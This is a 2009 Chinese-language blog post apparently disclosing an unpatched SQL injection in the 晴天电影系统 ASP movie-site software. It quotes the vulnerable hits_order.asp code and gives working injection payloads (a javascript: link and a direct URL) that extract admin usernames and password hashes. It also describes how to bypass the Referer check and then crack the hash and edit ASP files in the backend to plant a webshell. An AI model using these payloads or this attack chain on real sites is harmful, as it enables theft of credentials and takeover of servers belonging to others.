睛天电影系统 0DAY
This entry was posted on Oct 25 2009
作者:st0p & My5t3ry
转载请注明出处http://www.st0p.org
唉,和My5t3ry搞出的洞,联系了官方管理员,一直没人理我。
首先说注入问题
漏洞文件为/p_inc/hits_order.asp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | <!--#include file="../p_inc/config.asp"--> <!--#include file="../p_inc/function.asp"--> <!--#include file="../p_inc/function_func.asp"--> <!--#include file="../p_inc/openconn.asp"--> <!--#include file="../p_inc/G_function.asp"--> <% IF Not ChkPost() Then response.Redirect G_error_page_1 response.End() End IF '这里调用了/p_inc/function.asp文件中ChkPost()函数检测来源网址 Function G_hitss(url,numb) Dim str str="" sql="select top "&numb&" id,m_name,m_pic,m_hits,m_content from qingtiandy_movie where m_look=1 order by m_hits desc,id desc" '看到了没numb没有过滤 Set rs=server.CreateObject(G_RS) rs.open sql,conn,1,1 i=1 Do While Not rs.Eof d_url=url_(Array("d",rs(0),url)) str=str&"<div class=kkk1_list><a class=bbb href="&d_url&" title='主演:"&rs(2)&"'>"&Get_length(rs(1),"",32)&"</a> ("&rs(3)&")</div>" i=i+1 rs.movenext Loop G_hitss=str End Function %> document.write("<%=G_hitss(request("url"),request("numb"))%>") '这里的numb也没有过滤 |
利用方法如
1、可以直接用软件伪造Referer后,访问如下地址实现
2、通过XMLHTTP实现伪造Referer,访问如下地址实现
3、通过JS实现在来源网址用JAVASCRIPT来控制
1 | javascript:document.write("<a href='/p_inc/hits_order.asp?numb=1 (select str_username from tbl_admin) as username,(select str_pass from tbl_admin) as pass,'>科幻片</a> "); |
http://www.st0p.org/p_inc/hits_order.asp?numb=1 (select str_username from tbl_admin) as username,(select str_pass from tbl_admin) as pass,
注:只要跳过去Referer的检测,就可以通过POST,GET,COOKIE的各种方式来实现注入了。。。
访问以下内容后,管理员用户名在网址的链接中,密码HASH直接显示出来了。。
破解密码HASH,因为后台可以直接编辑ASP文件,进入后台拿SHELL就行了。
这程序还有别的漏洞。这里就不发了。。
88 Trackback(s)
You must be logged in to post a comment.